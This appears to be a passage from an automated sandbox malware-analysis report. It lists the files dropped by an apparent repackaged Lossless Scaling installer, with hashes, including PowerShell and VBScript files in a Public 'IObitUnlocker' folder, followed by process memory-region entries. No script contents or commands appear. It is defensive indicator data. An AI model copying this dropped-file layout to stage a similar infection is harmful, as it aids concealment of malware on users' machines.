                                                          4216eb3bcff34d8bf807ba9ae2329400

                                                          SHA1

                                                          9e3104f0caba8c9721720e24991e2ff767269fa6

                                                          SHA256

                                                          961fe22ac5b8226e13161868c2af0de3700a157b3ec14a8036e6c85f0c38e158

                                                          SHA512

                                                          d6551d03794594f9e9a602232d2ece63eb3ca26338949cc6684eefa1f2ddc9eb6fdd2a35b20410dd7978612d399ab882cc72ccd5b82097c9ce07b4ac7840fd72

                                                        • C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll

                                                          Filesize

                                                          25KB

                                                          MD5

                                                          c7a79602e51c7d382027d9cc4f4d9765

                                                          SHA1

                                                          cbcdfd3cdad01eba053b0bb7251876e218011764

                                                          SHA256

                                                          a2596374f8b643e4e4ac7d722a8f7ac83f9d315ab45bfa61074bf874651471bb

                                                          SHA512

                                                          77020357d3ea423a4508b7219bd0406be95c3344859d3099c515e65b00c1e1a1e1b19b1114fad86c60531a5a1b3ff773169dea2c17d694fe4eda4ae52adf3025

                                                        • C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll

                                                          Filesize

                                                          18KB

                                                          MD5

                                                          2474f6359b2686ebcc034214ecda6253

                                                          SHA1

                                                          a72a22c72ae8dad1aa559fec8606d75cd4896e58

                                                          SHA256

                                                          763e0f53f3cbb438b90fc14191d5d4a79fd1bd673004fdcb28cc8c3bb2837897

                                                          SHA512

                                                          173774423de3cb23d9fc856f7daa41ecea7b09cd0e03ebf06a0ea2319e1e55b82514a567ac96f8c03b52a98c84fa3c4c4e06a6ac437b047ba22bd98caddd8064

                                                        • C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                          MD5

                                                          204bb095c3b6f2dd1900864515cf4396

                                                          SHA1

                                                          2c9585abc0e7141a605a727482c13aebe9511e19

                                                          SHA256

                                                          84c89ef89af6099fa5b54e91e19c2e01c56ab0dc7c2cccc71a70465d1c0d5b0d

                                                          SHA512

                                                          f546de9e27330f040c39c87f298b0bf7da480593619a978ab060192a72c0920a39979317268b88ae06dcdc7245aff26d229a118efd8deebc02ce8e630f0cf4a9

                                                        • C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                          MD5

                                                          b55ecbe34dbc613abfbdc8d57c2071b1

                                                          SHA1

                                                          1120bfc3fadab03e517f6bbc7f889ec3c5240572

                                                          SHA256

                                                          2a993509736e479192fab00b8891720cce160027c0b2d4f1de972418d63b32d0

                                                          SHA512

                                                          bb6caeb9e340c3c9f0915f55f39953d33ccc79fb5db89aa1bad8b2d19dfa59fed5bd156e7b1f440f48c2c0a37267da8cc9818f22912386221959f928ee7a4864

                                                        • C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll

                                                          Filesize

                                                          21KB

                                                          MD5

                                                          ab3cde5ecc06776aca93dde3736c0015

                                                          SHA1

                                                          b3ed86db4c026facc759185c02b62f2d4a20630d

                                                          SHA256

                                                          1cbda2b28cef36d4af5806d5f22bdbd68ef04beed390b17fdde5e59fdb1b54eb

                                                          SHA512

                                                          6c21c007ca3fad6e13baca82e04ea3b66db2c6cd698406dd6f03bf873beed9df885e88431c994e1047db42cab02278cc6cf03b28e3a85fdbe693780d77864e96

                                                        • C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll

                                                          Filesize

                                                          19KB

                                                          MD5

                                                          582057f55647898e751a20e1800ee70b

                                                          SHA1

                                                          a57b958478eca835230fcec3391fb076e79c9611

                                                          SHA256

                                                          fef9fd58c457510844eecc4c6a868dbcb41855560301c4270c5478a9c64c3987

                                                          SHA512

                                                          17301d317e692fd66114742ea3e971214b8fab9932ac3ceeb555e57954115c14de3fa142fb1100d851d26839907218e5e3a7db30316059872ea9b296f20dabe0

                                                        • C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                          MD5

                                                          21a59e82a064b4c4ae687a1965762f57

                                                          SHA1

                                                          abd852cdb1d294a68e4bae8d1563d2954f98073a

                                                          SHA256

                                                          836579c9cbe44121211c074a99dadafa78cb8c3731ec2e4efc258368cae544df

                                                          SHA512

                                                          0027ae3ce2cddac83b64a4b7ca2d4ecbeebe3d5466ed7d94af020a80b6a11b14c0c55ba2af9dbdc3b6c290f38a72657e25761c5864a35fa54cc5b536bd1525d7

                                                        • C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll

                                                          Filesize

                                                          27KB

                                                          MD5

                                                          0c56b088ea3b949f89d0a6aaedef544a

                                                          SHA1

                                                          9369c7278ec8bcc6c880d99194de09fc2bd4efbe

                                                          SHA256

                                                          0a182a88ffcf20dcc892515a01db9af1a707814b982b9c21e1d9b3b4b203ceef

                                                          SHA512

                                                          d0df988558a1c448f3350affa93ba07f98e8de0d06bbbb562164e4ce73b59fc2f68cdc28af2035a7593299be7d5dc3d008aaf9181d7dd3ef5c039a1523731996

                                                        • C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll

                                                          Filesize

                                                          17KB

                                                          MD5

                                                          adc7b1becdd2018221d87b7cf738d89d

                                                          SHA1

                                                          5bbd8784574e8ac60e6fec0413b02408bf55fb04

                                                          SHA256

                                                          7cbfbbb179dc77b97d6442ad947cd93a23a723900a5d15c0d905b2cd16faa243

                                                          SHA512

                                                          0e2e93afef64f35def8f72ef7df2e9c8ecba338928ddf02e0f8b2e8ee94c689679c8be86d0ee8ec9cb7faf592889a127c22eacd14dd21cf3b487ddd32f9b5495

                                                        • C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll

                                                          Filesize

                                                          17KB

                                                          MD5

                                                          37f6c40defabf6b52616e77e588efae4

                                                          SHA1

                                                          69b0ec19792a2367fc72b84721a78a99c18f9c95

                                                          SHA256

                                                          93e95c9831f8baa3d295f61172930951220e3cf881a85f51cb76e3727562ad53

                                                          SHA512

                                                          a306954a492ef89dad9d9b69cdc16234a35517f191ad67356558b6dba417656a0635b4aaee6ca2b985196c6d5141212138c2579b98cf2f08f11d4d5b8d1e0252

                                                        • C:\Users\Admin\AppData\Local\Lossless Scaling\Settings.xml

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          45fed0a3bcbc889ca99d0c5943210e7e

                                                          SHA1

                                                          602584366a413cb9ae459b6c3231190cd787241e

                                                          SHA256

                                                          9812fe8104a86e693d6baa02a4cdb56ea9a4aedb500b050346eb5ec6bda8dd09

                                                          SHA512

                                                          d0728fcce9484daedb2c9552ee2a818f7cccbeb1e9bca24a1c4fc1ca6e8c181c46cdc89670bfee3d6ad219ea6f69750bd03f776af4f9e4667872c66c11dbd255

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismCorePS.dll

                                                          Filesize

                                                          200KB

                                                          MD5

                                                          7f751738de9ac0f2544b2722f3a19eb0

                                                          SHA1

                                                          7187c57cd1bd378ef73ba9ad686a758b892c89dc

                                                          SHA256

                                                          db995f4f55d8654fc1245da0df9d1d9d52b02d75131bc3bce501b141888232fc

                                                          SHA512

                                                          0891c2dedb420e10d8528996bc9202c9f5f96a855997f71b73023448867d7d03abee4a9a7e2e19ebe2811e7d09497bce1ea4e9097fcb810481af10860ff43dfb

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismHost.exe

                                                          Filesize

                                                          168KB

                                                          MD5

                                                          17275206102d1cf6f17346fd73300030

                                                          SHA1

                                                          bbec93f6fb2ae56c705efd6e58d6b3cc68bf1166

                                                          SHA256

                                                          dead0ebd5b5bf5d4b0e68ba975e9a70f98820e85d056b0a6b3775fc4df4da0f6

                                                          SHA512

                                                          ce14a4f95328bb9ce437c5d79084e9d647cb89b66cde86a540b200b1667edc76aa27a36061b6e2ceccecb70b9a011b4bd54040e2a480b8546888ba5cc84a01b3

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismProv.dll

                                                          Filesize

                                                          292KB

                                                          MD5

                                                          2ac64cc617d144ae4f37677b5cdbb9b6

                                                          SHA1

                                                          13fe83d7489d302de9ccefbf02c7737e7f9442f9

                                                          SHA256

                                                          006464f42a487ab765e1e97cf2d15bfa7db76752946de52ff7e518bc5bbb9a44

                                                          SHA512

                                                          acdb2c9727f53889aa4f1ca519e1991a5d9f08ef161fb6680265804c99487386ca6207d0a22f6c3e02f34eaeb5ded076655ee3f6b4b4e1f5fab5555d73addfd7

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\ImagingProvider.dll

                                                          Filesize

                                                          248KB

                                                          MD5

                                                          4c6d681704e3070df2a9d3f42d3a58a2

                                                          SHA1

                                                          a9f6286ac25f17b6b2acd1fce6459b0bc94c6c81

                                                          SHA256

                                                          f1bbab35b2602d04d096c8de060b2a5cf802499a937fd1ffe749ff7f54852137

                                                          SHA512

                                                          daa0c723312680256c24457162e0ef026b753ba267f3e2755f838e2864a163802c078d8668dd2c2064cb8887f4e382a73d6402a5533b6ac5c3cbf662ad83db86

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\LogProvider.dll

                                                          Filesize

                                                          108KB

                                                          MD5

                                                          c63f6b6d4498f2ec95de15645c48e086

                                                          SHA1

                                                          29f71180feed44f023da9b119ba112f2e23e6a10

                                                          SHA256

                                                          56aca41c62c8d0d1b26db3a01ef6c2da4a6a51fc963eb28411f8f7f029f1bfde

                                                          SHA512

                                                          3a634340d8c66cbc1bef19f701d8bdb034449c28afecce4e8744d18181a20f85a17af3b66c8853cecb8be53f69ae73f85b70e45deac29debab084a25eb3c69dc

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\OSProvider.dll

                                                          Filesize

                                                          180KB

                                                          MD5

                                                          e9833a54c1a1bfdab3e5189f3f740ff9

                                                          SHA1

                                                          ffb999c781161d9a694a841728995fda5b6da6d3

                                                          SHA256

                                                          ec137f9caebcea735a9386112cf68f78b92b6a5a38008ce6415485f565e5cf85

                                                          SHA512

                                                          0b18932b24c0257c80225c99be70c5125d2207f9b92681fd623870e7a62599a18fa46bcb5f2b4b01889be73aeb084e1b7e00a4968c699c7fdb3c083ef17a49f9

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\ServicingCommon.dll

                                                          Filesize

                                                          944KB

                                                          MD5

                                                          07231bdae9d15bfca7d97f571de3a521

                                                          SHA1

                                                          04aec0f1afcf7732bc4cd1f7aab36e460c325ba6

                                                          SHA256

                                                          be75afbbc30cad7235adf03dcc07fcee3c0c330c89b00e326ebbef2e57df5935

                                                          SHA512

                                                          2a46e0657e84481faf5c9d3de410884cb5c6e7b35039f5be04183cdac6c088cc42b12d0097e27836af14699e7815d794ca1cec80960833ab093b8dc6d44e2129

                                                        • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\TransmogProvider.dll

                                                          Filesize

                                                          1.3MB

                                                          MD5

                                                          c1c56a9c6ea636dbca49cfcc45a188c3

                                                          SHA1

                                                          d852e49978a08e662804bf3d7ec93d8f6401a174

                                                          SHA256

                                                          b20b3eb2df22998fd7f9ff6898ba707d6b8833a8274719a5e09d5148d868faaf

                                                          SHA512

                                                          f6db05e4644d734f81c2461e4ad49c4e81880c9e4beee13dbbda923360ef6cf4821fccd9040671b86ab2cd8c85fc313c951c1a69e4df14d94268753ce7ae5b2e

                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5qycdzl.lnw.ps1

                                                          Filesize

                                                          60B

                                                          MD5

                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                          SHA1

                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                          SHA256

                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                          SHA512

                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                        • C:\Users\Admin\Desktop\Lossless Scaling.lnk

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          ef4003d5449074011222ccbc5a2ebd84

                                                          SHA1

                                                          d72323ef0837450d73d35ceb4210565400f6d7db

                                                          SHA256

                                                          ca39a4436e43459d8d1a51f846794684be0ba38c3b1d1627d4276b453607c4bd

                                                          SHA512

                                                          8bd1211a0d902ecc42cfba7cd726860698e016eefab853a291dd073481b9ccd9e22c879de1c8b40b3b8901c54587e46cb762de6950aa364d30ba3b75c52e3766

                                                        • C:\Users\Public\IObitUnlocker\Backup.ps1

                                                          Filesize

                                                          438KB

                                                          MD5

                                                          10b1e2cf2353b33fce64e3b1c106007b

                                                          SHA1

                                                          9c9406a0cd0014244a0c136dbbda40b3c7fa3e8c

                                                          SHA256

                                                          a0b96bc8b17dad2a6f387dea162c675a1afdf3efa13680a0d6bf5436fcf2b5bf

                                                          SHA512

                                                          17fba8613583161ec0d16b8466632a16ae63481f90177b12aeb492e0124fd6ee10bff7009c17ccb6a9ca1b02a324a19a3838b4ec7bf346a23b281488d2ec6e1e

                                                        • C:\Users\Public\IObitUnlocker\Backup.vbs

                                                          Filesize

                                                          308B

                                                          MD5

                                                          59fca3c2fb6da0d16e0a280716e2f3ed

                                                          SHA1

                                                          dd01f82572e31875faa044c0152e48cc818ba5f3

                                                          SHA256

                                                          55e4fbd4febcf1db761a8f8732484998993b439bae2200f982d81ed35d55265d

                                                          SHA512

                                                          47caacc37ec8ae4c13120f713a35282da72e50dc7d2cdc6c50b1f96a07626d5db9e8c6d5822d8810c7a5096c476e737d8f7845e6fce23bbf39df7cad52938883

                                                        • C:\Users\Public\IObitUnlocker\Devn.exe

                                                          Filesize

                                                          7KB

                                                          MD5

                                                          857f8a07b6c9ad9bd3bb6e4c047fee45

                                                          SHA1

                                                          c2ded9a18bdb6cd2842db08354600a97cf90e032

                                                          SHA256

                                                          7083023d5ba4768a6398a92dfc6f8a7556efbeafb6a4d60347aea0f69b2e89af

                                                          SHA512

                                                          bbd176d8b6b46aa70a323e506a7d6ce671d14b79fc344cb0c4c8433ab761c9a7f6d2feed247276cda5503b6be529bd2e57c040a177725cc6ae7c100d76285e1f

                                                        • C:\Users\Public\IObitUnlocker\EN.dll

                                                          Filesize

                                                          95KB

                                                          MD5

                                                          d4793b21ec5937b74e6d9294428c52c9

                                                          SHA1

                                                          1c503c39fcbb2d76976eed31c220cef3b4883331

                                                          SHA256

                                                          60e8c2d4845358f86538d70f60e51eae2d98320cf5053632b181f5da08f6b8e6

                                                          SHA512

                                                          0ac97674a634d1ae93588172bc13b972371092714dcd30afc5048d2b06ce956efecda489a60644d22cf4e816e6f8f6b768a3426ba6404a737d1ce293fa31fd91

                                                        • C:\Users\Public\IObitUnlocker\HKCU.ps1

                                                          Filesize

                                                          451B

                                                          MD5

                                                          61784c5b761fd222f9fc4cd0aad1ce94

                                                          SHA1

                                                          ede36fbb733f67c2059dd9e6744f5a58913c139b

                                                          SHA256

                                                          c3b21f00fb1451aae184e534311bd368b5677b61da75e52df7c9dbad7bcf5be0

                                                          SHA512

                                                          76eeb2c26f0b36e56ac85b551410104ed3f5ca73a814af486f87ee213e86d57750a5c1546c77b49954f42aff9af631eca78de2e6cfa7dc8f700a7d06c16a023f

                                                        • C:\Users\Public\IObitUnlocker\Lan.vbs

                                                          Filesize

                                                          432B

                                                          MD5

                                                          023fb285bf9850ccc10287a3a8db3603

                                                          SHA1

                                                          7f07762fad599cd96c903e7f279ff06607db667a

                                                          SHA256

                                                          1fe2373734955e60c172999142934b52e69ba7ab9039b3c18ea54082ba32afcd

                                                          SHA512

                                                          18464264cdad2a1853715161bb0a38d2a85f5e62f223e3c278d3aa68345850edbafa3f5770b5bd83354991cab8b39837ca06bb3437b32097ebdf3eee5ad3a12f

                                                        • C:\Users\Public\IObitUnlocker\Loader.vbs

                                                          Filesize

                                                          308B

                                                          MD5

                                                          2993b76e0b0ba015caf654881638a0c0

                                                          SHA1

                                                          7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

                                                          SHA256

                                                          0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

                                                          SHA512

                                                          a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

                                                        • C:\Users\Public\IObitUnlocker\RAR.exe

                                                          Filesize

                                                          629KB

                                                          MD5

                                                          d3e9f98155c0faab869ccc74fb5e8a1e

                                                          SHA1

                                                          8e4feaad1d43306fdd8aa66efa443bca7afde710

                                                          SHA256

                                                          3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

                                                          SHA512

                                                          2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

                                                        • C:\Users\Public\IObitUnlocker\RAR.exe

                                                          Filesize

                                                          629KB

                                                          MD5

                                                          a0dafda5ec1ac16a9667ec673214eae0

                                                          SHA1

                                                          d51b6b9482030d0d1784976f71d7429adf7c5e01

                                                          SHA256

                                                          e91a84a11d3048cbc9e6e75f07eec743de686dd91153bec5fe426cf327039025

                                                          SHA512

                                                          5ccdd94a09206164ad48c5eda66689574d75afeb49b7a2ef3e73dcdc978ec0b173af7cb9cef3f2b53c00133f05e3950dd2d9587092d43390b0766f0a8b48f148

                                                        • C:\Users\Public\IObitUnlocker\RU.dll

                                                          Filesize

                                                          327B

                                                          MD5

                                                          83bf9ba8becac139cb05c1ab68468e62

                                                          SHA1

                                                          8fab7c51fb2a340af6ed6cd03e1c546479e14239

                                                          SHA256

                                                          7bfd69bdd83904d39a4e09c55fe6e380f027a2f13593c167acf92160bb9cf125

                                                          SHA512

                                                          b3f19d613db7067cfc87c6c7e341f189c99fe1849ee67f18b4b63d65b6299612cd1c935fb713f274dfaf837b5dee17bde20f04e8682f85d75f42b1838ee04f04

                                                        • C:\Users\Public\IObitUnlocker\Report.ps1

                                                          Filesize

                                                          458KB

                                                          MD5

                                                          0ad042427660b11cca79d546de7d7004

                                                          SHA1

                                                          f2e9457d805c80915ca4c7e6031a326a881a956c

                                                          SHA256

                                                          56b1807543175fece178e45526226d6ceb2fb8674238bfdde7d21aee3e9c302c

                                                          SHA512

                                                          370fd35d60869c5f902a1c631f4bf0e29fe249ade765261410d9a35f0d854cabcc343e9f82a7c9aa7ab49650338d2faeee34698839ca84f15937f62f0aa8d96b

                                                        • C:\Users\Public\IObitUnlocker\UK.dll

                                                          Filesize

                                                          5KB

                                                          MD5

                                                          615bf7d2dcc78514bcab13af644048a7

                                                          SHA1

                                                          9aec4464097e468f488247486a65e6fa2cc9bd54

                                                          SHA256

                                                          85a63cfa374af7b8493a0ca9ae19908f8b88cc702e5db1371361d9549778399f

                                                          SHA512

                                                          63fec543feb283f309ec01c176b9b62c1e1033e861711a115d77157a7f42fb204dbeade9b96b892050d676d7f4f6ff1dc32c9cc66840e4aa772173c10afd579e

                                                        • C:\Users\Public\IObitUnlocker\Win.ps1

                                                          Filesize

                                                          6KB

                                                          MD5

                                                          7cac76a8517a50e2972a49412f6d8322

                                                          SHA1

                                                          7c739c6cdbb2266f1349ac6d4105c054e0f3ac23

                                                          SHA256

                                                          04c36687638947852d85d508dd255c6aea6cb8a53e94067bed7e8c976f75725e

                                                          SHA512

                                                          e63a55b7f2c8a384807be77cc349c57bf6f39dd2f9f0b237957b7797ff4ef40da6d641c910346bb4ee511680a77ffd2725e9960e738841ece5fe6dd410f3b81a

                                                        • C:\Users\Public\IObitUnlocker\diagerr.xml

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          5c7edf49e355d46cfc4c94efe1d157b6

                                                          SHA1

                                                          fab78dd9e673f3726894bf79f6821c1fc8c685e6

                                                          SHA256

                                                          58d64002cfa1b8f4f833357c1a4b769fb0881b100e80581c5ca3d8ae5681e89e

                                                          SHA512

                                                          72043194dd3f861128e0c27d542a67ec8597b70c120c989aaf8967113147422d723626513c2e2f3df6ae82f27f936047e6d33de2b3bd714e5b2be6b2c06f7f21

                                                        • C:\Users\Public\IObitUnlocker\done.reg

                                                          Filesize

                                                          250B

                                                          MD5

                                                          ff047b633dfa3af4e5b5c78c1c84515b

                                                          SHA1

                                                          edca05a1a23484322da3932074af30de93d4c041

                                                          SHA256

                                                          963e9de4561957e19eb200c7446aaba4e59392040eaa5006717bf826a589cc21

                                                          SHA512

                                                          3e0f46a9c8626a6f53e710676b42802f014f9bac8dbb1af58e42c3e1f7df80ca074e137d4b98fa5739b07028f11eed7f569b55232a2c85dd5d8a7b23dc8420d3

                                                        • C:\Windows\Logs\DISM\dism.log

                                                          Filesize

                                                          285KB

                                                          MD5

                                                          fd3447db41f5769c35fd60c46c882071

                                                          SHA1

                                                          d0816ffa980f5a506da8bdf7452478a92c9480cf

                                                          SHA256

                                                          3e2d2e3ef4aeab037ef1755c10f4c4a76b2039f2a14f8f30ee2cf691094903d7

                                                          SHA512

                                                          bf7e82cd88ca45ae81f1e8ff59fa8eff4d950b428e22acfd16aefd4cf4da15c38bb8ff4291035e63710344945cf96a099e4d9efa236a8fa19175e67d23bfc5b8

                                                        • C:\Windows\Logs\DISM\dism.log

                                                          Filesize

                                                          288KB

                                                          MD5

                                                          3052ecfab542e90545da2b9649202552

                                                          SHA1

                                                          bd77bbecb5063b6058da7a62fd2d2622951e94bf

                                                          SHA256

                                                          86b1257df2bf60c69057ee8f4441166adb4bf9326cdb019dd92f8944e59b0719

                                                          SHA512

                                                          fb8a274f0197ed4d0dbf0c5ca04e8780e0b2cbcb893cf5f5fe1828896ca6a2e79060230840e851ff3409ce1929a14c72272888c4b453363376b4eadf046d8cba

                                                        • memory/404-825-0x000001E2C8AF0000-0x000001E2C8BD6000-memory.dmp

                                                          Filesize

                                                          920KB

                                                        • memory/572-80-0x000001EB79B70000-0x000001EB79B78000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/572-78-0x000001EB79080000-0x000001EB7913A000-memory.dmp

                                                          Filesize

                                                          744KB

                                                        • memory/572-77-0x000001EB78F10000-0x000001EB78FC2000-memory.dmp

                                                          Filesize

                                                          712KB

                                                        • memory/572-72-0x000001EB5DF50000-0x000001EB5DF58000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/572-71-0x000001EB768E0000-0x000001EB76906000-memory.dmp

                                                          Filesize

                                                          152KB

                                                        • memory/572-70-0x000001EB76800000-0x000001EB768E6000-memory.dmp

                                                          Filesize

                                                          920KB

                                                        • memory/572-69-0x000001EB5C0E0000-0x000001EB5C1D4000-memory.dmp

                                                          Filesize

                                                          976KB

                                                        • memory/572-73-0x000001EB5DF60000-0x000001EB5DF6A000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/572-82-0x000001EB79B90000-0x000001EB79B9E000-memory.dmp

                                                          Filesize

                                                          56KB

                                                        • memory/572-79-0x000001EB78FC0000-0x000001EB78FF8000-memory.dmp

                                                          Filesize

                                                          224KB

                                                        • memory/2332-971-0x0000000008890000-0x0000000008906000-memory.dmp

                                                          Filesize

                                                          472KB

                                                        • memory/2332-974-0x0000000008B20000-0x0000000008B2A000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/2332-430-0x0000000005700000-0x000000000570A000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/2332-433-0x0000000006830000-0x00000000068CC000-memory.dmp

                                                          Filesize

                                                          624KB

                                                        • memory/2332-434-0x0000000006D90000-0x0000000006DF6000-memory.dmp

                                                          Filesize

                                                          408KB

                                                        • memory/2332-428-0x0000000005BE0000-0x0000000006186000-memory.dmp

                                                          Filesize

                                                          5.6MB

                                                        • memory/2332-981-0x0000000009710000-0x0000000009722000-memory.dmp

                                                          Filesize

                                                          72KB

                                                        • memory/2332-979-0x0000000009670000-0x00000000096BC000-memory.dmp

                                                          Filesize

                                                          304KB

                                                        • memory/2332-978-0x00000000092E0000-0x0000000009637000-memory.dmp

                                                          Filesize

                                                          3.3MB

                                                        • memory/2332-977-0x0000000008C90000-0x0000000008CF0000-memory.dmp

                                                          Filesize

                                                          384KB

                                                        • memory/2332-973-0x0000000008840000-0x000000000885E000-memory.dmp

                                                          Filesize

                                                          120KB

                                                        • memory/2332-972-0x0000000008D10000-0x00000000091E4000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/2332-976-0x0000000008BB0000-0x0000000008C40000-memory.dmp

                                                          Filesize

                                                          576KB

                                                        • memory/2332-429-0x0000000005720000-0x00000000057B2000-memory.dmp

                                                          Filesize

                                                          584KB

                                                        • memory/2332-975-0x0000000008BA0000-0x0000000008BAA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/3896-5-0x00000176E1F10000-0x00000176E1F32000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/4264-423-0x0000000000400000-0x0000000000416000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/4264-768-0x0000000140000000-0x000000014017D000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/4264-576-0x0000000140000000-0x000000014017D000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/4284-422-0x0000029AD1990000-0x0000029AD199A000-memory.dmp

                                                          Filesize

                                                          40KB